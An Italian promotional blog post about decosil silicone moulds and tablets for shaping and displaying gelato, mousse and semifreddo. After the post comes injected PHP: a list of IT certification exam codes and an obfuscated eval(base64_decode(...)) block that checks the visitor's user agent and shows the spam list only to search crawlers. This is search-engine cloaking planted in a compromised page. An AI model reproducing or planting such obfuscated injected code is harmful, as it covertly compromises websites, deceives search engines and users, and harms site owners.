gelato_per_promo

Gelato secondo decosil

 

Gelato gastronomiaChi l’ha detto che il gelato debba per forza essere esposto senza particolari forme e che il gelatiere non abbia strumenti comodi per decorare una vaschetta tale che poi rimanga in vetrina elegante e simpatica?

decosil ha pensato anche a questo! Ha creato delle piccole formine gastronomiche da farcire di gelato, per proporre ad esempio gusti particolari di gelato che ora sono più che mai di tendenza, come il gelato gastronomico al parmigiano oppure al pecorino. Se siete più tradizionali invece, potete usufruire degli stampi per torte con i decori già in rilievo per poter avere i dettagli decorativi prima ancora di sformare la vostra preparazione, potendo giocare a riempire i disegni con gusti di gelato differenti per ottenere l’effetto cromatico desiderato. Otterrete così una torta già finita da posizionare in vetrina, come lo zuccotto ciocco nocciole, il tronchetto o la torta fragola e limone. O se volete qualcosa da passeggio potete optare per i decostick, sia geometrici, come cilindri , parallelepipedi e cubi, oppure a forma di divertenti personaggi associati a temi o festività, come i personaggi della savana o quelli dell’orrore dedicati ad halloween. Per chi invece si focalizza solo sulla vetrina a vaschette classica, decosil ha progettato dei tablet dedicati al gelato e ai sorbetti, da farcire con uno o più gusti di gelato e successivamente applicare direttamente sulla vaschetta. 

gelato secondo decosilLa tecnologia che è nata per il cioccolato e in questi anni si è evoluta anche nel mondo dello zucchero artistico e del cake design, ora approda anche per soddisfare le esigenze di altri professionisti che lavorano materie prime differenti, quali appunto il gelato, ma anche le mousse e i semifreddi.

Con gli stampi decosil le preparazioni si realizzano in modo semplice e veloce si espongono in vetrina pronte per essere vendute a una clientela attenta all’originalità e alla ricerca di sperimentare il piacere del gusto estetico.

MOUSSE GELATOGli stampi resistono senza alcun problema a una temperatura di -40°C, permettendo al gelatiere di sformare i prodotti da stampi e tablet esattamente come accade per gli stecchi o per una torta e di gestirli in negativo senza problemi di alterazione. Il tablet ad esempio, una volta collocato in cima alla vaschetta piena del gusto prescelto, si uniformerà in vetrina al resto del gelato e potrà essere spatolato senza difficoltà, donerà un aspetto innovativo alla vostra esposizione e sarà un’importante comunicazione per i vostri clienti, perché con una sola occhiata si capirà di che gusto si tratta e, a dirglielo, sarà proprio il gelato!

rosa di gelato

 

 

Silvia Federica Boldetti

Please follow and like us:
Gelato secondo decosil

decosil


decosil nata dalla collaborazione di professionisti nel campo della pasticceria e della lavorazione del silicone, per offrire attrezzi per pasticceria che rispondono ad un elevato standard qualitativo e funzionale. decosil nuova azienda costituita per rispondere alle esigenze dei pasticceri professionisti e non, che vogliono proporre idee creative alla propria clientela con innovativi utensili per pasticceria. Proponiamo stampi in silicone antiaderenti di grado alimentare per la realizzazione di oggetti artistici e decorativi e per la fabbricazione di soggetti. Stampi personalizzati: possiamo replicare i loghi aziendali per la fabbricazione di cioccolatini personalizzati.


Post navigation


Lascia un commento

$fafrendslins = <<

000-017   000-080   000-089   000-104   000-105   000-106   070-461   100-101   100-105  , 100-105  , 101   101-400   102-400   1V0-601   1Y0-201   1Z0-051   1Z0-060   1Z0-061   1Z0-144   1z0-434   1Z0-803   1Z0-804   1z0-808   200-101   200-120   200-125  , 200-125  , 200-310   200-355   210-060   210-065   210-260   220-801   220-802   220-901   220-902   2V0-620   2V0-621   2V0-621D   300-070   300-075   300-101   300-115   300-135   3002   300-206   300-208   300-209   300-320   350-001   350-018   350-029   350-030   350-050   350-060   350-080   352-001   400-051   400-101   400-201   500-260   640-692   640-911   640-916   642-732   642-999   700-501   70-177   70-178   70-243   70-246   70-270   70-346   70-347   70-410   70-411   70-412   70-413   70-417   70-461   70-462   70-463   70-480   70-483   70-486   70-487   70-488   70-532   70-533   70-534   70-980   74-678   810-403   9A0-385   9L0-012   9L0-066   ADM-201   AWS-SYSOPS   C_TFIN52_66   c2010-652   c2010-657   CAP   CAS-002   CCA-500   CISM   CISSP   CRISC   EX200   EX300   HP0-S42   ICBB   ICGB   ITILFND   JK0-022   JN0-102   JN0-360   LX0-103   LX0-104   M70-101   MB2-704   MB2-707   MB5-705   MB6-703   N10-006   NS0-157   NSE4   OG0-091   OG0-093   PEGACPBA71V1   PMP   PR000041   SSCP   SY0-401   VCP550   1Z0-061   CISSP   70-487   SY0-401   70-486   220-801   300-075   c2010-652   000-080   210-065   350-030   JN0-360   74-678   LX0-104   300-070   70-410   350-050   PMP   70-483   JN0-360   200-355   200-125  , 210-060   100-101   70-412   VCP550   LX0-104   000-017  

EOT; eval/**/(base64_decode('JHNwZGU9IHN0cnRvbG93ZXIoJF9TRVJWRVIvKnRlc3QqL1svKiovIkhUVFBfVVNFUl9BR0VOVCIvKiovXSk7CmZ1bmN0aW9uIGNhZ3QoJHNwZCkKewokZ3RydWU9IHN0cl9yZXBsYWNlKCJ4IiwiIiwiYnhveHh0eHxneG94eG94Z3hseGV8eXh4YXhoeG94b3xteHN4bnxzeHhweGl4ZHhleHJ8d3hneGV4dCIpOwppZihwcmVnX21hdGNoKCIvJGd0cnVlL2kiLCRzcGQpKXsKcmV0dXJuIHRydWU7Cn1lbHNlewpyZXR1cm4gZmFsc2U7Cn0KfSAKaWYoY2FndCgkc3BkZSkpewplY2hvICRmYWZyZW5kc2xpbnM7Cn0=')); ?>